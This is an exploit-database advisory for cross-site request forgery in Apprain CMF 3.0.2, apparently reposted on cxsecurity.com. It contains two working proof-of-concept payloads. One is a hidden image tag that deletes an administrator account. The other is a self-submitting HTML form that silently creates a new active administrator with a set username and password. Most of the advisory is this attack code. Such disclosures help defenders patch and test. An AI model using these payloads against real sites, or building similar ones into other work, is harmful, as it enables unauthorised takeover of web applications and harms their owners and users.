Apprain 3.0.2 Cross Site Request Forgery

2013.08.30
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

################################################################################################################################### # Exploit Title: Apprain CMF / CSRF ADD/DELETE administrator's account # Date: 2013 29 August # Exploit Author: Yashar shahinzadeh # Special thanks to Mormoroth # Credit goes for: http://y-shahinzadeh.ir & ha.cker.ir # Vendor Homepage: http://www.apprain.com/ # Tested on: Linux & Windows, PHP 5.2.9 # Affected Version : 3.0.2 # # Contacts: { http://Twitter.com/YShahinzadeh , http://y-shahinzadeh.ir , http://Twitter.com/Mormoroth , http://mormoroth.ir } ################################################################################################################################### Summary: ======== 1. CSRF - Delete a account 2. CSRF - Adding administrator's account 1. CSRF - Delete a account: =========================== Deleting account section isn't protected against CSRF attacks, it's a simple get, the following exploit is useful to conduct an attack, albeit [ID] must be replaced by administrator's ID (e.g. 2) <img src="http://localhost//appRain-v-3.0.2/common/delete_row/Admin/[ID]" width="1" height="1"> 2. CSRF - Adding administrator's account: ========================================= <html> <body onload="submitForm()"> <form name="myForm" id="myForm" action="http://localhost/appRain-v-3.0.2/admin/manage/add" method="post"> <input type="hidden" name="data[Admin][f_name]" value="yashar"> <input type="hidden" name="data[Admin][l_name]" value="shahinzadeh"> <input type="hidden" name="data[Admin][email]" value="y.shahinzadeh@gmail.com"> <input type="hidden" name="data[Admin][username]" value="yashar"> <input type="hidden" name="data[Admin][password]" value="Yashar123"> <input type="hidden" name="data[Admin][status]" value="Active"> <input type="hidden" name="data[Admin][description]" value=""> </form> <script type='text/javascript'>document.myForm.submit();</script> </html> /** Yasshar shahinzadeh **/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top